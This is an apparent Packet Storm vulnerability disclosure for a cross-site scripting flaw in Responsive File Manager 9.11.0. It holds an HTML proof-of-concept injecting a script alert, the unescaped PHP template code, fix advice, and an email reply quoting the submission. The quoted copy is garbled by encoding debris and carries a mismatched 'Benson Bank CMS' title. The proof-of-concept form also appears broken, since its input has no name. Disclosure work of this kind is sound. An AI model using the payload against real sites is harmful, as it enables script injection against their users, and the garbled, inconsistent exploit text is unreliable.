Responsive File Manager version 9.11.0 suffers from a cross site scripting vulnerability.
7f7ce38cc78f93242a74a8859b055f73ca4783acbc3403a97eae45a277641f05
*=============================================================|
| Exploit Title: ResponsiveFilemanager Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.responsivefilemanager.com/
|
| Download Link : https://github.com/trippo/ResponsiveFilemanager/archive/master.zip
|
| Version : v9.11.0
|
| Tested on: Kali Linux
|
| Date: 1 /10 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
|    <TITLE>ResponsiveFilemanage Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php" method="get">
| <input type="hidden" id="current_url" value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/>
|</form>
|</BODY>
|</HTML>
*=======================|
|How to fix this vulnerability :
|
|You should first filter all input variables, and then escape every value before you echo it into the page. The sink here is the `current_url` hidden input, which echoes `$base_url.$_SERVER['REQUEST_URI']` into an attribute value without encoding; wrapping each echoed value in `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` (output encoding) closes the attribute-injection path, whereas input filtering alone does not :)
|
*=======================|
|Vulnerable code :
|
|<body>
|    <input type="hidden" id="ftp" value="<?php echo !!$ftp; ?>" />
|    <input type="hidden" id="popup" value="<?php echo $popup;?>" />
|    <input type="hidden" id="callback" value="<?php echo $callback; ?>" />
|    <input type="hidden" id="crossdomain" value="<?php echo $crossdomain;?>" />
|    <input type="hidden" id="editor" value="<?php echo $editor;?>" />
|    <input type="hidden" id="view" value="<?php echo $view;?>" />
|    <input type="hidden" id="subdir" value="<?php echo $subdir;?>" />
|    <input type="hidden" id="field_id" value="<?php echo $field_id;?>" />
|    <input type="hidden" id="type_param" value="<?php echo $type_param;?>" />
|    <input type="hidden" id="upload_dir" value="<?php echo $upload_dir;?>" />
|    <input type="hidden" id="cur_dir" value="<?php echo $cur_dir;?>" />
|    <input type="hidden" id="cur_dir_thumb" value="<?php echo $thumbs_path.$subdir;?>" />
|    <input type="hidden" id="insert_folder_name" value="<?php echo trans('Insert_Folder_Name');?>" />
|    <input type="hidden" id="new_folder" value="<?php echo trans('New_Folder');?>" />
|    <input type="hidden" id="ok" value="<?php echo trans('OK');?>" />
|    <input type="hidden" id="cancel" value="<?php echo trans('Cancel');?>" />
|    <input type="hidden" id="rename" value="<?php echo trans('Rename');?>" />
|    <input type="hidden" id="lang_duplicate" value="<?php echo trans('Duplicate');?>" />
|    <input type="hidden" id="duplicate" value="<?php if($duplicate_files) echo 1; else echo 0;?>" />
|    <input type="hidden" id="base_url" value="<?php echo $base_url?>"/>
|    <input type="hidden" id="ftp_base_url" value="<?php echo $ftp_base_url?>"/>
|    <input type="hidden" id="fldr_value" value="<?php echo $subdir;?>"/>
|    <input type="hidden" id="sub_folder" value="<?php echo $rfm_subfolder;?>"/>
|    <input type="hidden" id="return_relative_url" value="<?php echo $return_relative_url == true ? 1 : 0;?>"/>
|    <input type="hidden" id="lazy_loading_file_number_threshold" value="<?php echo $lazy_loading_file_number_threshold?>"/>
|    <input type="hidden" id="file_number_limit_js" value="<?php echo $file_number_limit_js;?>" />
|    <input type="hidden" id="sort_by" value="<?php echo $sort_by;?>" />
|    <input type="hidden" id="descending" value="<?php echo $descending?1:0;?>" />
|    <input type="hidden" id="current_url" value="<?php echo str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>" />
|    <input type="hidden" id="lang_show_url" value="<?php echo trans('Show_url');?>" />
|    <input type="hidden" id="copy_cut_files_allowed" value="<?php if($copy_cut_files) echo 1; else echo 0;?>" />
|    <input type="hidden" id="copy_cut_dirs_allowed" value="<?php if($copy_cut_dirs) echo 1; else echo 0;?>" />
|    <input type="hidden" id="copy_cut_max_size" value="<?php echo $copy_cut_max_size;?>" />
|    <input type="hidden" id="copy_cut_max_count" value="<?php echo $copy_cut_max_count;?>" />
|    <input type="hidden" id="lang_copy" value="<?php echo trans('Copy');?>" />
|    <input type="hidden" id="lang_cut" value="<?php echo trans('Cut');?>" />
|    <input type="hidden" id="lang_paste" value="<?php echo trans('Paste');?>" />
|    <input type="hidden" id="lang_paste_here" value="<?php echo trans('Paste_Here');?>" />
|    <input type="hidden" id="lang_paste_confirm" value="<?php echo trans('Paste_Confirm');?>" />
|    <input type="hidden" id="lang_files" value="<?php echo trans('Files');?>" />
|    <input type="hidden" id="lang_folders" value="<?php echo trans('Folders');?>" />
|    <input type="hidden" id="lang_files_on_clipboard" value="<?php echo trans('Files_ON_Clipboard');?>" />
|    <input type="hidden" id="clipboard" value="<?php echo ((isset($_SESSION['RF']['clipboard']['path']) && trim($_SESSION['RF']['clipboard']['path']) != null) ? 1 : 0);?>" />
|    <input type="hidden" id="lang_clear_clipboard_confirm" value="<?php echo trans('Clear_Clipboard_Confirm');?>" />
|    <input type="hidden" id="lang_file_permission" value="<?php echo trans('File_Permission');?>" />
|    <input type="hidden" id="chmod_files_allowed" value="<?php if($chmod_files) echo 1; else echo 0;?>" />
|    <input type="hidden" id="chmod_dirs_allowed" value="<?php if($chmod_dirs) echo 1; else echo 0;?>" />
|    <input type="hidden" id="lang_lang_change" value="<?php echo trans('Lang_Change');?>" />
|    <input type="hidden" id="edit_text_files_allowed" value="<?php if($edit_text_files) echo 1; else echo 0;?>" />
|    <input type="hidden" id="lang_edit_file" value="<?php echo trans('Edit_File');?>" />
|    <input type="hidden" id="lang_new_file" value="<?php echo trans('New_File');?>" />
|    <input type="hidden" id="lang_filename" value="<?php echo trans('Filename');?>" />
|    <input type="hidden" id="lang_file_info" value="<?php echo fix_strtoupper(trans('File_info'));?>" />
|    <input type="hidden" id="lang_edit_image" value="<?php echo trans('Edit_image');?>" />
|    <input type="hidden" id="lang_error_upload" value="<?php echo trans('Error_Upload');?>" />
|    <input type="hidden" id="lang_select" value="<?php echo trans('Select');?>" />
|    <input type="hidden" id="lang_extract" value="<?php echo trans('Extract');?>" />
|    <input type="hidden" id="transliteration" value="<?php echo $transliteration?"true":"false";?>" />
|    <input type="hidden" id="convert_spaces" value="<?php echo $convert_spaces?"true":"false";?>" />
|    <input type="hidden" id="replace_with" value="<?php echo $convert_spaces? $replace_with : "";?>" />
|    <input type="hidden" id="lower_case" value="<?php echo $lower_case?"true":"false";?>" />
|    <input type="hidden" id="show_folder_size" value="<?php echo $show_folder_size;?>" />
|    <input type="hidden" id="add_time_to_img" value="<?php echo $add_time_to_img;?>" />
|
*=============================================================|
| Special Thanks To : Ehsan Cod3r O micle O Und3rgr0und O Amir.ght O
| xenotixO modiretO V For Vendetta O Alireza O r4ouf O Spoofer O
| And All Of My Friends O The Last One : My Self, M.R.S.L.YA
*=============================================================|
From: Packet Storm <packet@packetstormsecurity.com>
To: aaNc Kha! aa <nc_521@yahoo.com>
Sent: Wednesday, 11 January 2017, 6:40:19
Subject: Re: ResponsiveFilemanager Cross Site Scripting
Why does one part say Benson Bank CMS and another ResponsiveFileManager?
On Tue, Jan 10, 2017 at 02:52:42PM +0000, aaNc Kha! aa wrote:
> *=============================================================|
> |A ExploitA Title:A ResponsiveFilemanagerA CrossA SiteA Scripting
> |
> |A ExploitA Author:A AshiyaneA DigitalA SecurityA Team
> |
> |A VendorA Homepage:A http://www.responsivefilemanager.com/
> |
> |A DownloadA LinkA :A https://github.com/trippo/ResponsiveFilemanager/archive/master.zip
> |
> |A VersionA :A v9.11.0
> |
> |A TestedA on:A KaliA Linux
> |
> |A Date:A 1A /10A /A 2017
> *=============================================================|
> |A ExploitA Code:
> |
> |<HTML>
> |<HEAD>
> |A A A A <TITLE>BensonA BankA CMSA vA 5.5A -A 2015.09.09A CrossA SiteA Scripting</TITLE>
> |</HEAD>
> |<BODY>
> |<formA action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php"A method="get">
> |A <inputA type="hidden"A id="current_url"A value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/>
> |</form>
> |</BODY>
> |</HTML>
> *=======================|
> |HowA toA fixA thisA vulnerabilityA :
> |
> |YouA shouldA firstA tryA toA f.ilterA allA inputA variablesA OA AfterA useA commandA echoA inA scriptA :)
> |
> *=======================|
> |VulnerableA codeA :
> |
> |<body>
> |A A A A <inputA type="hidden"A id="ftp"A value="<?phpA echoA !!$ftp;A ?>"A />
> |A A A A <inputA type="hidden"A id="popup"A value="<?phpA echoA $popup;?>"A />
> |A A A A <inputA type="hidden"A id="callback"A value="<?phpA echoA $callback;A ?>"A />A A A A
> |A A A A <inputA type="hidden"A id="crossdomain"A value="<?phpA echoA $crossdomain;?>"A />
> |A A A A <inputA type="hidden"A id="editor"A value="<?phpA echoA $editor;?>"A />
> |A A A A <inputA type="hidden"A id="view"A value="<?phpA echoA $view;?>"A />
> |A A A A <inputA type="hidden"A id="subdir"A value="<?phpA echoA $subdir;?>"A />
> |A A A A <inputA type="hidden"A id="field_id"A value="<?phpA echoA $field_id;?>"A />
> |A A A A <inputA type="hidden"A id="type_param"A value="<?phpA echoA $type_param;?>"A />
> |A A A A <inputA type="hidden"A id="upload_dir"A value="<?phpA echoA $upload_dir;?>"A />
> |A A A A <inputA type="hidden"A id="cur_dir"A value="<?phpA echoA $cur_dir;?>"A />
> |A A A A <inputA type="hidden"A id="cur_dir_thumb"A value="<?phpA echoA $thumbs_path.$subdir;?>"A />
> |A A A A <inputA type="hidden"A id="insert_folder_name"A value="<?phpA echoA trans('Insert_Folder_Name');?>"A />
> |A A A A <inputA type="hidden"A id="new_folder"A value="<?phpA echoA trans('New_Folder');?>"A />
> |A A A A <inputA type="hidden"A id="ok"A value="<?phpA echoA trans('OK');?>"A />
> |A A A A <inputA type="hidden"A id="cancel"A value="<?phpA echoA trans('Cancel');?>"A />
> |A A A A <inputA type="hidden"A id="rename"A value="<?phpA echoA trans('Rename');?>"A />
> |A A A A <inputA type="hidden"A id="lang_duplicate"A value="<?phpA echoA trans('Duplicate');?>"A />
> |A A A A <inputA type="hidden"A id="duplicate"A value="<?phpA if($duplicate_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="base_url"A value="<?phpA echoA $base_url?>"/>
> |A A A A <inputA type="hidden"A id="ftp_base_url"A value="<?phpA echoA $ftp_base_url?>"/>
> |A A A A <inputA type="hidden"A id="fldr_value"A value="<?phpA echoA $subdir;?>"/>
> |A A A A <inputA type="hidden"A id="sub_folder"A value="<?phpA echoA $rfm_subfolder;?>"/>
> |A A A A <inputA type="hidden"A id="return_relative_url"A value="<?phpA echoA $return_relative_urlA ==A trueA ?A 1A :A 0;?>"/>
> |A A A A <inputA type="hidden"A id="lazy_loading_file_number_threshold"A value="<?phpA echoA $lazy_loading_file_number_threshold?>"/>
> |A A A A <inputA type="hidden"A id="file_number_limit_js"A value="<?phpA echoA $file_number_limit_js;?>"A />
> |A A A A <inputA type="hidden"A id="sort_by"A value="<?phpA echoA $sort_by;?>"A />
> |A A A A <inputA type="hidden"A id="descending"A value="<?phpA echoA $descending?1:0;?>"A />
> |A A A A <inputA type="hidden"A id="current_url"A value="<?phpA echoA str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>"A />
> |A A A A <inputA type="hidden"A id="lang_show_url"A value="<?phpA echoA trans('Show_url');?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_files_allowed"A value="<?phpA if($copy_cut_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_dirs_allowed"A value="<?phpA if($copy_cut_dirs)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_max_size"A value="<?phpA echoA $copy_cut_max_size;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_max_count"A value="<?phpA echoA $copy_cut_max_count;?>"A />
> |A A A A <inputA type="hidden"A id="lang_copy"A value="<?phpA echoA trans('Copy');?>"A />
> |A A A A <inputA type="hidden"A id="lang_cut"A value="<?phpA echoA trans('Cut');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste"A value="<?phpA echoA trans('Paste');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste_here"A value="<?phpA echoA trans('Paste_Here');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste_confirm"A value="<?phpA echoA trans('Paste_Confirm');?>"A />
> |A A A A <inputA type="hidden"A id="lang_files"A value="<?phpA echoA trans('Files');?>"A />
> |A A A A <inputA type="hidden"A id="lang_folders"A value="<?phpA echoA trans('Folders');?>"A />
> |A A A A <inputA type="hidden"A id="lang_files_on_clipboard"A value="<?phpA echoA trans('Files_ON_Clipboard');?>"A />
> |A A A A <inputA type="hidden"A id="clipboard"A value="<?phpA echoA ((isset($_SESSION['RF']['clipboard']['path'])A &&A trim($_SESSION['RF']['clipboard']['path'])A !=A null)A ?A 1A :A 0);?>"A />
> |A A A A <inputA type="hidden"A id="lang_clear_clipboard_confirm"A value="<?phpA echoA trans('Clear_Clipboard_Confirm');?>"A />
> |A A A A <inputA type="hidden"A id="lang_file_permission"A value="<?phpA echoA trans('File_Permission');?>"A />
> |A A A A <inputA type="hidden"A id="chmod_files_allowed"A value="<?phpA if($chmod_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="chmod_dirs_allowed"A value="<?phpA if($chmod_dirs)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="lang_lang_change"A value="<?phpA echoA trans('Lang_Change');?>"A />
> |A A A A <inputA type="hidden"A id="edit_text_files_allowed"A value="<?phpA if($edit_text_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="lang_edit_file"A value="<?phpA echoA trans('Edit_File');?>"A />
> |A A A A <inputA type="hidden"A id="lang_new_file"A value="<?phpA echoA trans('New_File');?>"A />
> |A A A A <inputA type="hidden"A id="lang_filename"A value="<?phpA echoA trans('Filename');?>"A />
> |A A A A <inputA type="hidden"A id="lang_file_info"A value="<?phpA echoA fix_strtoupper(trans('File_info'));?>"A />
> |A A A A <inputA type="hidden"A id="lang_edit_image"A value="<?phpA echoA trans('Edit_image');?>"A />
> |A A A A <inputA type="hidden"A id="lang_error_upload"A value="<?phpA echoA trans('Error_Upload');?>"A />
> |A A A A <inputA type="hidden"A id="lang_select"A value="<?phpA echoA trans('Select');?>"A />
> |A A A A <inputA type="hidden"A id="lang_extract"A value="<?phpA echoA trans('Extract');?>"A />
> |A A A A <inputA type="hidden"A id="transliteration"A value="<?phpA echoA $transliteration?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="convert_spaces"A value="<?phpA echoA $convert_spaces?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="replace_with"A value="<?phpA echoA $convert_spaces?A $replace_withA :A "";?>"A />
> |A A A A <inputA type="hidden"A id="lower_case"A value="<?phpA echoA $lower_case?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="show_folder_size"A value="<?phpA echoA $show_folder_size;?>"A />
> |A A A A <inputA type="hidden"A id="add_time_to_img"A value="<?phpA echoA $add_time_to_img;?>"A />
> |
> *=============================================================|
> |A SpecialA ThanksA ToA :A EhsanA Cod3rA OA micleA OA Und3rgr0undA OA Amir.ghtA O
> |A xenotixOA modiretOA VA ForA VendettaA OA AlirezaA OA r4oufA OA SpooferA O
> |A AndA AllA OfA MyA FriendsA OA TheA LastA OneA :A MyA Self,A M.R.S.L.YA A
> *=============================================================|